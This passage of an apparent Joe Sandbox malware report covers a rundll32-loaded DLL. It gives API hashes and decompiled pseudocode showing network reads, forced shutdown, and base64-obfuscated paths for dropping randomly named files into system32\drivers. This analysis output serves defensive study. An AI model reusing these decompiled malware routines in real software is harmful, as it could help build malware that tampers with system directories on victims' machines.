            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 008722ebc5c55bf02cf93ee3d880f2bf6535d1cb723afbe45f3708d3cb5b8931
            • Instruction ID: 429567ee138713cc7d1fb87d8f160ac62efaac39d3f4df16b73647169d7c4b87
            • Opcode Fuzzy Hash: 008722ebc5c55bf02cf93ee3d880f2bf6535d1cb723afbe45f3708d3cb5b8931
            • Instruction Fuzzy Hash: 649002705055219BEE015B11CF494097B61ABC4705F008454E04D40030C7319810EA01
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: gethostbyname
            • String ID:
            • API String ID: 930432418-0
            • Opcode ID: 05e41723ed0a8037c4578c7a948b0b8a63a99cfb4cc59ac2d943447070d7b44e
            • Instruction ID: 0d2d6050cfce57933b45c6e53f9aa9dc9bc4905d00d8a83e77bf324908419f10
            • Opcode Fuzzy Hash: 05e41723ed0a8037c4578c7a948b0b8a63a99cfb4cc59ac2d943447070d7b44e
            • Instruction Fuzzy Hash: 6A900270545110ABDE015B11CF594197EB1AB88701B148458E48940031C7318810EA01
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003F72(char* _a4) {
            				int _t2;
            
            				_t2 = PathFileExistsA(_a4); // executed
            				return _t2;
            			}




            0x10003f76
            0x10003f7c

            APIs
            • PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: ExistsFilePath
            • String ID:
            • API String ID: 1174141254-0
            • Opcode ID: b54471f397a0d8406c378fc9e06ab65f4bca33af0b81d7c7b1cf25565e94f53f
            • Instruction ID: 22fc78391477ad96e85b828bbcbeae1f812a7d3dd0aa48fa7cc8604c4f1e63b0
            • Opcode Fuzzy Hash: b54471f397a0d8406c378fc9e06ab65f4bca33af0b81d7c7b1cf25565e94f53f
            • Instruction Fuzzy Hash: 5B9002705051109BEE015B11CF494097A61AB84705B008458E05D40031C7719910EE01
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 026E00BE
            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction ID: 740fa05a95178eddfaabdf8e88b0e5252541f1a3181913f3e7cde246bf101f4f
            • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction Fuzzy Hash: 1EF02E3255B3916DFA1477347C84A27BB98DF43325B150D9BDC42F6091DE51D8428AF4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryA.KERNEL32 ref: 026E0E92
            • GetProcAddress.KERNEL32(?,00000000), ref: 026E0EB4
            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: fb92c6333be858c605df516a8dbac1de34355592668ca30c740f87b13d0c7776
            • Instruction ID: 9ffd14284f1ce5d290dc9df8c08cbee4f03bb2ba3056dc00070977af4161764f
            • Opcode Fuzzy Hash: fb92c6333be858c605df516a8dbac1de34355592668ca30c740f87b13d0c7776
            • Instruction Fuzzy Hash: 1FF08277A111049FEB10CF58C8C09AAF7B1EF942A93298479D886A7314D635FD568A50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: K
            • API String ID: 0-856455061
            • Opcode ID: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
            • Instruction ID: 9aa4ec9f8917db308ce764332d9eea5b3a3a2b02149446eca5bd3df864230787
            • Opcode Fuzzy Hash: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
            • Instruction Fuzzy Hash: 00D1F331104689ADDB21CFAC8C80EFFBBBCAF4AA40F840549FD85CB642D555E92DA771
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: K
            • API String ID: 0-856455061
            • Opcode ID: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
            • Instruction ID: deea517a90883ebe1c394bfda45a9bedc53e3a2fe2376341d0b219587cd6ae1c
            • Opcode Fuzzy Hash: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
            • Instruction Fuzzy Hash: 719113311046896EDB21CFAD8C80EFFBBBCAF46A40F840549FE85C7642D255E92DA771
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003F41(void* _a4, void* _a8, long _a12, DWORD* _a16) {
            
            				return InternetReadFile(_a4, _a8, _a12, _a16);
            			}



            0x10003f57

            APIs
            • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: FileInternetRead
            • String ID:
            • API String ID: 778332206-0
            • Opcode ID: 6a62bc2528f7a5b567bc78c0f48248627d88bb206eba26def179137dd21eb727
            • Instruction ID: a30d9a41c0b764188012c088025fa824fd0bff4a88c7a91d48d8e585c0123706
            • Opcode Fuzzy Hash: 6a62bc2528f7a5b567bc78c0f48248627d88bb206eba26def179137dd21eb727
            • Instruction Fuzzy Hash: E1B00472519392ABDF02DFA1CE4882ABAB6BB88301F084D5CF2A540071C7328428EB02
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003F63(int _a4, long _a8) {
            
            				return ExitWindowsEx(_a4, _a8);
            			}



            0x10003f71

            APIs
            • ExitWindowsEx.USER32(?,?), ref: 10003F6B
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: ExitWindows
            • String ID:
            • API String ID: 1089080001-0
            • Opcode ID: a0d9fa97b1e1e39b06bdef1288d6089e46bfaf0110e54166fccdcd3b95f73ca3
            • Instruction ID: 4ef2750e7b628f6ec6f30376c7cf025ff7e7fc08bc077e4d2af0ab61b57d367d
            • Opcode Fuzzy Hash: a0d9fa97b1e1e39b06bdef1288d6089e46bfaf0110e54166fccdcd3b95f73ca3
            • Instruction Fuzzy Hash: 3BA00175509212ABDE025B51CE4884ABEA6AB89381F00C868F18940031C73294A1EB12
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: '
            • API String ID: 0-1997036262
            • Opcode ID: c66cf635900fd9560f5d33fce30572d65f1195a3a7c35dcba06b6c48dfc04a12
            • Instruction ID: f389f15fd0a8877f73eb6a91fb6ffbaafb7a2d8a217a3cbe01a0a4cb358a3832
            • Opcode Fuzzy Hash: c66cf635900fd9560f5d33fce30572d65f1195a3a7c35dcba06b6c48dfc04a12
            • Instruction Fuzzy Hash: 5581276940E3D19FC7438B785CF91823FA2AE1B24434F09DAC4C09F4B7E1995D49C7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e62f34c450c3ba46a9bfd7c7600c86e50cf775180cb61537211fd409f1f57de4
            • Instruction ID: f71a1d995dd8a74e42fea6d118e748ebb32253c85ead114849ce9a4637845e86
            • Opcode Fuzzy Hash: e62f34c450c3ba46a9bfd7c7600c86e50cf775180cb61537211fd409f1f57de4
            • Instruction Fuzzy Hash: 0D5206726083558BDB0CCE29C59026EFBE2FFC4344F154A2EE89797394D7B19949CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
            • Instruction ID: 4ac6500bd546590d7ea14c6efde5edf5aedc1e10ba929c21bb6b156839336c8c
            • Opcode Fuzzy Hash: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
            • Instruction Fuzzy Hash: D7314C33E2C6B607E324DF7A4C84025F7D6EB4A0A275A8779DE88E3255D128EC11CBD0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 40%
            			E100053B7(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
            				intOrPtr _v8;
            				void _v71;
            				char _v72;
            				void _v331;
            				char _v332;
            				void _v591;
            				char _v592;
            				void _v851;
            				char _v852;
            				void _v4947;
            				signed char _v4948;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				int _t82;
            				int _t86;
            				int _t88;
            				CHAR* _t104;
            				void* _t118;
            				signed int _t120;
            				signed int _t122;
            				signed int _t124;
            				signed int _t126;
            				signed int _t128;
            				signed int _t130;
            				CHAR* _t132;
            				CHAR* _t136;
            				CHAR* _t138;
            				intOrPtr _t142;
            				signed int _t147;
            				signed int _t151;
            				void* _t155;
            				void* _t157;
            				signed int _t158;
            				signed int _t162;
            				signed int _t163;
            				signed int _t164;
            				signed int _t165;
            				signed int _t166;
            				signed int _t167;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				int _t183;
            				intOrPtr _t186;
            				void* _t198;
            				void* _t199;
            				void* _t202;
            				intOrPtr _t204;
            				void* _t205;
            				void* _t206;
            				signed int _t216;
            				void* _t220;
            
            				_t220 = __fp0;
            				_t170 = __edx;
            				_t144 = __ecx;
            				E1000CD20(0x1350, __ecx);
            				if(_a12 != 0) {
            					_t82 =  *0x10015fb8; // 0x0
            					_t202 =  *((intOrPtr*)(_a8 + 0xc)) - _t82;
            					_t183 = 0;
            					__eflags = 0;
            					do {
            						_push(_t82 + 0xfffffffe);
            						_push(_a4 + _t183);
            						_push( *0x10015fc8);
            						_t86 = E1000CDA6(_a4 + _t183, _t144, _t170, __eflags);
            						_t206 = _t206 + 0xc;
            						__eflags = _t86;
            						_t82 =  *0x10015fb8; // 0x0
            						if(_t86 == 0) {
            							_t183 = _t183 + _t82 - 1;
            						}
            						_t183 = _t183 + 1;
            						__eflags = _t183 - _t202;
            					} while (__eflags <= 0);
            				} else {
            					_t204 =  *0x1000e1b8;
            					_t142 =  *0x1000e248;
            					_t186 =  *((intOrPtr*)(_a8 + 0xc)) -  *0x10015fb8;
            					_t4 =  &_a12;
            					 *_t4 = _a12 & 0x00000000;
            					_t216 =  *_t4;
            					_v8 = _t186;
            					do {
            						_t88 =  *0x10015fb8; // 0x0
            						_push(_t88 - 1);
            						_push(_a12 + _a4);
            						_push( *0x10015fc8);
            						_t82 = E1000CDA6(_a4, _a12 + _a4, _t170, _t216);
            						_t206 = _t206 + 0xc;
            						_t217 = _t82;
            						if(_t82 == 0) {
            							_v72 = _v72 & _t82;
            							_t147 = 0xf;
            							memset( &_v71, _t82, _t147 << 2);
            							asm("stosw");
            							asm("stosb");
            							wsprintfA( &_v72, "%s\\%s", 0x100165a4, 0x100165a8);
            							_v4948 = _v4948 & 0x00000000;
            							memset( &_v4947, 0, 0x3ff << 2);
            							asm("stosw");
            							asm("stosb");
            							E10005318(0, _t217,  &_v4948);
            							_v852 = _v852 & 0x00000000;
            							_t151 = 0x40;
            							_v592 = _v592 & 0x00000000;
            							memset( &_v851, 0, _t151 << 2);
            							asm("stosw");
            							asm("stosb");
            							_push(0x40);
            							memset( &_v591, 0, 0 << 2);
            							asm("stosw");
            							asm("stosb");
            							wsprintfA( &_v852, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
            							_push(0x100165a8);
            							_t104 = E10001000(0, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz");
            							_t155 = 0x100165a4;
            							wsprintfA( &_v592, _t104);
            							_push(0);
            							_push( &_v852);
            							E1002B8D2(_t142, _t155, _t170, 0x100165a4, _t204);
            							asm("cdq");
            							E1000443D( &_v4948, _t142, _t155, _t170,  &_v4948,  &_v592);
            							_pop(_t157);
            							E10021A45( *_a8 + _a12, _t142, _t157, _t170, 0x100165a4, _t204, _t217);
            							_v332 = _v332 & 0x00000000;
            							_t158 = 0x40;
            							_t118 = memset( &_v331, 0, _t158 << 2);
            							asm("stosw");
            							asm("stosb");
            							0x1003a38c(_t142, 0, _t170,  *0x10015ff4,  *_a8 + _a12,  &_v72, 9, 0);
            							E100274E5(_t118, _t142, _t170, _t204, _t205, _t217);
            							_t120 = rand();
            							asm("cdq");
            							_t162 = 0x18;
            							_t198 = 0x61;
            							_t122 = rand();
            							asm("cdq");
            							_t163 = 0x19;
            							_t124 = rand();
            							asm("cdq");
            							_t164 = 0x17;
            							_t126 = rand();
            							asm("cdq");
            							_t165 = 0x19;
            							_t128 = rand();
            							asm("cdq");
            							_t166 = 0x18;
            							_t130 = rand();
            							asm("cdq");
            							_t167 = 0x19;
            							_t170 = _t130 % _t167 + _t198;
            							_t132 = E10001000(_t167, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj");
            							_t168 = _t170;
            							wsprintfA( &_v332, _t132);
            							_t206 = _t206 + 0x8c;
            							_t136 =  &_v332;
            							0x10036371(0x40000000, 1, 0, 2, 0, 0, _t128 % _t166 + _t198, _t126 % _t165 + _t198, _t124 % _t164 + _t198, _t122 % _t163 + _t198, _t120 % _t162 + _t198, 0, _t118);
            							_t199 = _t136;
            							_push(_t136);
            							_push(_t170);
            							E10023C7B(_t136, _t142, _t168, _t199, _t204, 0);
            							Sleep(0x3e8);
            							_t138 =  &_v332;
            							_push(_t138);
            							_push(_t138);
            							E1002EC87(_t138, _t142, _t168, 0);
            							_t169 =  *0x10015fb8; // 0x0
            							_t186 = _v8;
            							_t82 = _a12 + _t169 - 1;
            							_a12 = _t82;
            						}
            						_a12 = _a12 + 1;
            					} while (_a12 <= _t186);
            				}
            				return _t82;
            			}
























































            0x100053b7
            0x100053b7
            0x100053b7
            0x100053bf
            0x100053ca
            0x100055e9
            0x100055ee
            0x100055f0
            0x100055f0
            0x100055f2
            0x100055f5
            0x100055fb
            0x100055fc
            0x10005602
            0x10005607
            0x1000560a
            0x1000560c
            0x10005611
            0x10005613
            0x10005613
            0x10005617
            0x10005618
            0x10005618
            0x100053d0
            0x100053d3
            0x100053da
            0x100053e3
            0x100053e9
            0x100053e9
            0x100053e9
            0x100053ed
            0x100053f0
            0x100053f0
            0x100053f9
            0x100053ff
            0x10005400
            0x10005406
            0x1000540b
            0x1000540e
            0x10005410
            0x10005416
            0x1000541b
            0x1000541f
            0x10005421
            0x10005423
            0x10005437
            0x10005439
            0x1000544d
            0x1000544f
            0x10005451
            0x10005459
            0x1000545e
            0x10005467
            0x10005470
            0x10005477
            0x10005479
            0x1000547b
            0x1000547c
            0x10005487
            0x10005489
            0x1000548b
            0x1000549e
            0x100054a3
            0x100054ae
            0x100054b3
            0x100054bc
            0x100054c7
            0x100054c9
            0x100054ca
            0x100054cf
            0x100054de
            0x100054e7
            0x100054fc
            0x10005502
            0x1000550b
            0x10005516
            0x10005518
            0x1000551a
            0x1000551c
            0x10005523
            0x1000552a
            0x1000552e
            0x1000552f
            0x10005534
            0x10005538
            0x1000553c
            0x1000553d
            0x10005543
            0x10005547
            0x10005548
            0x1000554e
            0x10005552
            0x10005553
            0x10005559
            0x1000555d
            0x1000555e
            0x10005564
            0x10005568
            0x10005569
            0x1000556c
            0x10005574
            0x10005579
            0x10005582
            0x10005584
            0x10005590
            0x1000559c
            0x100055a1
            0x100055a2
            0x100055a3
            0x100055a4
            0x100055ae
            0x100055b4
            0x100055ba
            0x100055bb
            0x100055bc
            0x100055c4
            0x100055ca
            0x100055cd
            0x100055d1
            0x100055d1
            0x100055d4
            0x100055d7
            0x100055e0
            0x1000561f

            APIs
            Strings
            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
            • c:\windows\system32\drivers\%s, xrefs: 10005498
            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
            • %s\%s, xrefs: 10005431
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: rand$wsprintf$FilePrintSleep
            • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
            • API String ID: 2577056782-455112146
            • Opcode ID: eee3dc6be947996a921319d690027e2d4820ae61922b7a4e00a9d481ac99203d
            • Instruction ID: 64546e9388752df838bc4033515aa0a8afcfc879ecc6bfc3b3dc2cd959c3d1fd
            • Opcode Fuzzy Hash: eee3dc6be947996a921319d690027e2d4820ae61922b7a4e00a9d481ac99203d
            • Instruction Fuzzy Hash: 0D610873A40258BFEB10DB64CC46FDF77ADEB84351F184466F604AB180CBB5EA818A64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 55%
            			E1000721F(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags, void* __fp0) {
            				void* _t141;
            				void* _t142;
            				intOrPtr* _t150;
            				intOrPtr _t151;
            				intOrPtr* _t152;
            				intOrPtr _t153;
            				intOrPtr* _t160;
            				intOrPtr _t161;
            				void* _t162;
            				intOrPtr* _t164;
            				intOrPtr _t165;
            				intOrPtr* _t170;
            				intOrPtr _t171;
            				intOrPtr _t173;
            				intOrPtr _t177;
            				intOrPtr _t178;
            				intOrPtr* _t183;
            				intOrPtr _t184;
            				intOrPtr* _t188;
            				intOrPtr _t189;
            				intOrPtr* _t193;
            				intOrPtr* _t194;
            				void* _t196;
            				signed int _t201;
            				intOrPtr _t204;
            				void* _t209;
            				intOrPtr* _t210;
            				intOrPtr _t215;
            				intOrPtr* _t226;
            				intOrPtr* _t229;
            				intOrPtr* _t230;
            				intOrPtr* _t239;
            				intOrPtr* _t242;
            				intOrPtr* _t245;
            				intOrPtr _t256;
            				intOrPtr _t260;
            				intOrPtr* _t261;
            				void* _t266;
            
            				_t307 = __fp0;
            				_t272 = __eflags;
            				_t254 = __edi;
            				_t250 = __edx;
            				_t209 = __ebx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__esi);
            				E1000774B();
            				_push("IPEnabled=TRUE");
            				_push("Win32_NetworkAdapterConfiguration");
            				 *((intOrPtr*)(_t266 - 4)) = 0;
            				if(E100077B2(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t272, __fp0) == 0) {
            					L61:
            					_t215 = _t266 - 0x7c;
            					 *((intOrPtr*)(_t266 - 4)) = 0xb;
            					_t141 = E1002A8C6(E10007A27(_t215), _t209, _t215, _t250, _t254, _t266);
            					asm("cld");
            					 *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) =  *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) - 1;
            					asm("adc al, [eax]");
            					 *((intOrPtr*)(_t209 + 0x645ef44d)) =  *((intOrPtr*)(_t209 + 0x645ef44d)) + _t215;
            					 *0 = _t215;
            					return _t141;
            				} else {
            					_push(__edi);
            					 *((intOrPtr*)(_t266 - 0x14)) = 0;
            					 *((char*)(_t266 - 4)) = 1;
            					if( *((intOrPtr*)(_t266 - 0x68)) != 0) {
            						_t201 =  *((intOrPtr*)(_t266 - 0x64)) -  *((intOrPtr*)(_t266 - 0x68));
            						_t275 = _t201 & 0xfffffffc;
            						if((_t201 & 0xfffffffc) > 0) {
            							_push("Index");
            							_push(0);
            							_push(_t266 - 0x28);
            							_t254 = E10007A73(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t275, __fp0);
            							_t204 =  *_t254;
            							if(_t204 != 0) {
            								0x1003afbd(_t254, _t204 + 8);
            							}
            							E10007696(_t266 - 0x14);
            							 *((intOrPtr*)(_t266 - 0x14)) =  *_t254;
            							E10007696(_t266 - 0x28);
            						}
            					}
            					_t142 = E1000767F(_t266 - 0x14, _t250);
            					_t278 = _t142;
            					if(_t142 == 0) {
            						L59:
            						_t217 =  *((intOrPtr*)(_t266 - 0x14));
            						_pop(_t254);
            						if( *((intOrPtr*)(_t266 - 0x14)) != 0) {
            							E1000515C(_t142, _t217);
            							 *((intOrPtr*)(_t266 - 0x14)) = 0;
            						}
            						goto L61;
            					}
            					_push(_t209);
            					_push("Win32_NetworkAdapterConfiguration.Index=");
            					E1000504D(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
            					_t219 = _t266 - 0x18;
            					_push(_t266 - 0x14);
            					 *((char*)(_t266 - 4)) = 2;
            					_t142 = E1000762A(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
            					_t210 =  *0x1000e218;
            					 *((intOrPtr*)(_t266 - 0x10)) = 0;
            					 *((intOrPtr*)(_t266 - 0x28)) = 0;
